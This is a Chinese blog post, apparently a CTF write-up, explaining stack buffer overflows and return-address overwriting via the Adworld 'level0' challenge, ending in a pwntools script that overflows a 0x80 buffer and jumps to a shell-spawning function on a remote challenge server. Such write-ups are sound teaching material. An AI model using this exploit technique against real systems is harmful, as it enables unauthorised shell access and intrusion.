栈溢出之覆盖函数返回地址

最新推荐文章于 2024-07-08 12:28:19 发布
最新推荐文章于 2024-07-08 12:28:19 发布
阅读量3.3k 收藏 12
点赞数 7
分类专栏: 二进制安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iczfy585/article/details/109150644
版权

栈溢出之覆盖函数返回地址

原理

栈溢出:栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。

函数调用的时候,会开辟一个栈帧结构。首先会将调用的函数的参数入栈,然后依次压入调用函数的返回地址当前栈底指针寄存器(BP)的值入栈。其中压入返回地址是通过call指令来实现的。
在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。

当用call指令调用一个函数的时候,首先会将IP寄存器中的值压入栈。然后开一个栈帧结构,一般汇编代码如下:

push %ebp 
mov %esp %ebp
...
leave
ret

通过一张图来简单说明:
在这里插入图片描述
call指令将IP寄存器中的值压入栈后。用push %ebp将bp寄存器的值压入栈。
mov %esp %ebp:将esp的值赋给ebp,这时候sp和bp的值相等,栈为空。然后就会将一些局部变量等压入栈,进行相关的操作。
函数调用结束时,首先用leave指令,等价于如下操作:

mov %ebp %esp
pop %ebp

首先将ebp的值赋给esp,这时sp指针就指向了栈底了。然后pop %ebp就还原了调用函数BP值。同时esp会+1(向高地址方向),使得esp指向的是返回地址
最后ret指令的作用:弹出SP指针指向的内存单元的值(返回地址)。并且程序跳转到该位置处继续执行。

利用

这里用攻防世界的题目来巩固一下。
题目:pwn 新手练习 level0

  1. 首先查看一下文件的相关情况
    pwn checksec level0
    在这里插入图片描述
    64位的程序,注意到No canary found,没有栈哨。这为覆盖函数返回地址提供了条件。
  2. 用ida进行静态分析
    进入main函数,F12查看源码:

在这里插入图片描述

该程序是打印"Hello,world\n"后,返回了vulnerable_function()函数。

跟进这个vulnerable_function()函数。

在这里插入图片描述

发现直接将0x200个数的字符写到了0x80大小的缓冲区。可以直接实现缓冲区溢出漏洞。观察到了有一个callsystem函数,跟进一下:
在这里插入图片描述
执行后可以直接getshell。

  1. 计算偏移地址
    通过IDA我们可以直接读到缓冲区距离BP指向的位置的距离是0x80。这时候我们根据上面画出的栈帧结构图,还需要覆盖掉BP的值,应为这里是64位的程序,所以BP是占8字节的,然后最后是填充callsystem函数的地址。在IDA中的函数窗口中可以看到位0x400596
    在这里插入图片描述
    4.写脚本getshell
    最后我们写脚本拿到服务器的shell
from pwn import *
context(os='linux',log_level='debug') #打印调试信息
r = remote('220.249.52.133',52305)

r.recvuntil('\n')
payload='a'*0x80+'b'*8+p64(0x400596)
r.sendline(payload)
r.interactive()

在这里插入图片描述

iringzh
关注
专栏目录
栈溢出覆盖返回地址实践
ChuMeng1999的博客
01-10 1068
目录预备知识1.关于栈溢出的一些基础知识2.对“栈”简单介绍实验目的实验环境实验步骤一使用Olldbg动态调试程序,观察栈溢出的过程实验步骤二 预备知识 1.关于栈溢出的一些基础知识 如果你关注网络安全,那么你一定听说过缓冲区溢出。简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据撑爆了小缓冲区,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,本质都是一样的。 2.对“栈”简单介绍 从计算机科学的角度讲,栈指的是一种数据结构,是一种先进后出的数据表。
手把手教你栈溢出入门
Sakura给爷pwn全场
10-29 760
观察下列个C语言代码: #include<stdio.h> void vulnerable(){ char buf[10]; gets(buf); } int main(){ vulnerable(); } 你会发现这个代码很简单,但是它会产生巨大的安全隐患。在C语言中,gets()函数是典型的危险函数。那么gets()函数为什么会产生巨大的安全隐患呢? 这要从内存的运行原理说起。这里需要涉及一点点的汇编知识。 在内存中有一种叫做栈的结构,当C语言调用函数时,会在栈中产生一个栈帧。内存中
Windows漏洞利用开发系列教程第二部分:栈溢出覆盖返回地址
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
9.pwn 栈溢出(基本ROP)
最新发布
2301_80361487的博客
07-08 932
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息,栈溢出可以导致控制流劫持。
栈溢出覆盖返回地址
新博客:https://aping-dev.com/
05-26 2278
#include<stdio.h> #include<stdlib.h> int stack_over_flow() { char Password[16] = { 0, }; gets(Password); return 0; } void readfile() { FILE* fp; char FileStr[20] = { 0, }; pri...
栈溢出之构造函数覆盖返回地址
iczfy585的博客
10-20 770
栈溢出利用已知函数覆盖返回地址 题目:攻防世界 level2 查看文件的保护,发现没有栈哨,可以考虑覆盖返回地址。 利用IDA进行静态分析,找到vulnerable_function()函数 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x100u); } read函数读入了0x100的大小到缓冲区,但是缓冲区只
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 808
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,会有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
PWN入门(4)覆盖程序函数返回地址
Ba1_Ma0的博客
09-09 1041
有什么不会或者是错误的地方的可以私信我,看到必回。
从零开始学习软件漏洞挖掘系列教程第二篇:栈溢出覆盖返回地址实践.pdf
01-31
本篇教程介绍了如何通过栈溢出漏洞覆盖返回地址来实现对软件的攻击。栈溢出是缓冲区溢出的一种形式,通常发生在程序的栈内存区域。当程序在栈上分配的局部变量空间不足以存储过多的数据时,就会发生栈溢出。由于栈是...
栈溢出、整型溢出、UAF溢出覆盖返回地址覆盖函数指针、覆盖SEH、格式化字符串溢出栈溢出利用
10-17
这些都是常见的漏洞类型,其中栈溢出、整型溢出、UAF溢出覆盖返回地址、格式化字符串溢出是比较常见的。栈溢出利用和覆盖函数指针、覆盖SEH则需要具体情况具体分析。 栈溢出:当程序向栈中写入超过其分配的空间时...
栈溢出crash小合集
11-15
5. **安全编程**:探讨防止栈溢出安全措施,如使用栈保护(如Canary值)、地址空间布局随机化(ASLR)和安全编程实践(如限制输入长度,使用安全字符串函数等)。 6. **模糊测试**:AFL的工作原理和应用,如何...
栈溢出基础
m0_56069948的博客
05-28 230
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 栈溢出基础 之前已经介绍了C语言函数调用栈,本文将正式介绍栈溢出攻击。 当函数调用结束时,将发生函数跳转,通过读取存放在栈上的信息(返回地址),跳转执行下一条指令。通过
溢出覆盖返回地址实现攻击
九层台
08-26 2582
都知道call语句分2步 1.把返回地址放入堆栈 2.跳转到call的地址 如果这个返回地址覆盖成我们想要执行的函数地址结果是不是很有趣 O(∩_∩)O 思路很见到,找到我们需要的地址然后覆盖原来的返回地址就行了 下面就讲一些实现的细节 #include   void win() {     printf("Congratulations, you pwned
栈的覆盖
Conan
06-16 701
同一线程中使用同一个栈,因而函数调用的时候往往会对栈进行覆盖使用,加入函数返回的是指针,可能就会有预料不到的结果。 #include int* get() { int i = 0x12345678; return &i; } int main() { int* p = get(); printf("%x\n",*p );//printf后修改了栈中i的地址的内容 printf("
网页木马攻防实战学习笔记二:缓冲区溢出
xlsj雪松的博客
08-23 447
1 常见案例 1.1 栈溢出 栈是一个在进程映象内存的高地址内的后进先出(LIFO) 的缓冲区。 #include<stdio.h> #include <string.h> char evil[] =”AAAAAAAAAAAAAAAAAAAAAAAA" ; void main() { char buff[4]; strcpy (buff,evil); ...
ch2:栈溢出,修改邻接变量,修改函数返回地址
1ame的博客
10-23 1890
实验环境: 操作系统 Windows7 IDE VC 6.0 build版本 debug 用于实验的C语言代码: #include #define PASSWORD "1234567" int verify_password(char * password) { int authenticated; //add loc
关于溢出覆盖的一些总结。
草色烟光
01-25 1016
最近在学习通过数组溢出覆盖来实现控制台程序弹框由浅入深的一些功能,书里面写的很好,我通过读书,有了一个递进的了解,总结一下: 第一个实验,是通过最简单的数组溢出,实现对函数调用以后本栈帧内部的判定变量,从程序逻辑角度对程序结果进行改变,只需要计算好先前定义的buffer数组的大小和输入内容的关系,保证不要多覆盖也不要少覆盖就行了。 第二个实验,实现在控制台程序中弹出对话框,这需要通过覆
c++堆栈溢出怎么解决_二进制安全栈溢出
weixin_39558221的博客
11-20 1080
本文主要介绍二进制安全栈溢出内容。栈基础内存四区代码区(.text):这个区域存储着被装入执行的二进制机器代码,处理器会到这个区域取指令执行。数据区(.data):用于存储全局变量和静态变量等。堆区:动态地分配和回收内存,进程可以在堆区动态地请求一定大小的内存,并在用完后归还给堆区。地址由高到低生长栈区:用于动态地存储函数之间的调用关系,以保证被调用函数返回时恢复到母函数中继续执行;此外局部变...
简单栈溢出覆盖的思考
weixin_44222568的博客
09-15 551
1.main函数F5反编译: 两个函数,第二个是system()函数,执行括号中的shell命令,此处就是重复输hello world.(注:system()会调用fork()产生子进程, 由子进程来调用/bin/sh-c string 来执行参数string 字符串所代表的命令, 此命令执行完后随即返回原调用的进程. 比如,在代码程序内部想获取当前目录下的文件名,很简单,可以这样:system(“ls”);) 2.进入 vulnerable_function: 第一行,给buf缓冲区变量申请0x88字
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值